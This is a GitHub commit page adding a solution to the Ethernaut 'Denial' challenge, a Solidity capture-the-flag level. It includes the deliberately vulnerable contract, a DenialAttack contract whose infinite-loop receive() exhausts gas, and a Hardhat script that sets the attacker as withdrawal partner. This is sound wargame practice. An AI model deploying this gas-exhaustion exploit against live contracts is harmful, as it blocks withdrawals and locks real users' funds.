Skip to content

Commit

Permalink
Challenge 20: Denial
Browse files Browse the repository at this point in the history
  • Loading branch information
antico5 committed Feb 4, 2022
1 parent a562453 commit e46b6db
Show file tree
Hide file tree
Showing 4 changed files with 76 additions and 1 deletion.
36 changes: 36 additions & 0 deletions ethernaut_challenges/contracts/20_Denial.sol
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import "@openzeppelin/contracts/math/SafeMath.sol";

contract Denial {
using SafeMath for uint256;
address public partner; // withdrawal partner - pay the gas, split the withdraw
address payable public constant owner = address(0xA9E);
uint256 timeLastWithdrawn;
mapping(address => uint256) withdrawPartnerBalances; // keep track of partners balances

function setWithdrawPartner(address _partner) public {
partner = _partner;
}

// withdraw 1% to recipient and 1% to owner
function withdraw() public {
uint256 amountToSend = address(this).balance.div(100);
// perform a call without checking return
// The recipient can revert, the owner will still get their share
partner.call.value(amountToSend)("");
owner.transfer(amountToSend);
// keep track of last withdrawal time
timeLastWithdrawn = now;
withdrawPartnerBalances[partner] = withdrawPartnerBalances[partner].add(amountToSend);
}

// allow deposit of funds
receive() external payable {}

// convenience function
function contractBalance() public view returns (uint256) {
return address(this).balance;
}
}
9 changes: 9 additions & 0 deletions ethernaut_challenges/contracts/20_DenialAttack.sol
Original file line number Diff line number Diff line change
@@ -0,0 +1,9 @@
// SPDX-License-Identifier: GPL-3.0

pragma solidity ^0.6.0;

contract DenialAttack {
receive() external payable {
while (true) {}
}
}
30 changes: 30 additions & 0 deletions ethernaut_challenges/scripts/20_denial.ts
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
import { Signer } from 'ethers'
import { ethers } from 'hardhat'
import { Denial } from '../typechain-types/Denial'
import { DenialAttack } from '../typechain-types/DenialAttack'
import { loadOrCreateLevelInstance, submitLevelInstance } from './ethernaut'
import { loadOrDeployContract } from './helpers'

const levelAddress = '0xf1D573178225513eDAA795bE9206f7E311EeDEc3'

const main = async () => {
const signer = (await ethers.getSigners())[0] as Signer

const targetContract = (await loadOrCreateLevelInstance('Denial', levelAddress, signer, {
value: ethers.utils.parseEther('0.001'),
})) as Denial
const attackContract = (await loadOrDeployContract('DenialAttack', [], signer)) as DenialAttack

const tx = await targetContract.setWithdrawPartner(attackContract.address)
console.log(`tx hash ${tx.hash}`)
await tx.wait()

await submitLevelInstance(targetContract.address, signer)
}

main()
.then(() => process.exit())
.catch(e => {
console.error(e)
process.exit(1)
})
2 changes: 1 addition & 1 deletion ethernaut_challenges/scripts/ethernaut.ts
Original file line number Diff line number Diff line change
Expand Up @@ -47,7 +47,7 @@ export const loadOrCreateLevelInstance = async (
}

export const submitLevelInstance = async (instanceAddress: string, signer: Signer): Promise<boolean> => {
const submitTx = await getEthernautContract(signer).submitLevelInstance(instanceAddress, {gasLimit: 1000000})
const submitTx = await getEthernautContract(signer).submitLevelInstance(instanceAddress, { gasLimit: 2000000 })
console.log(`Submitted level instance address ${instanceAddress}. Tx ID: ${submitTx.hash}`)
const receipt = await submitTx.wait()
if (receipt.logs.length) {
Expand Down

0 comments on commit e46b6db

Please sign in to comment.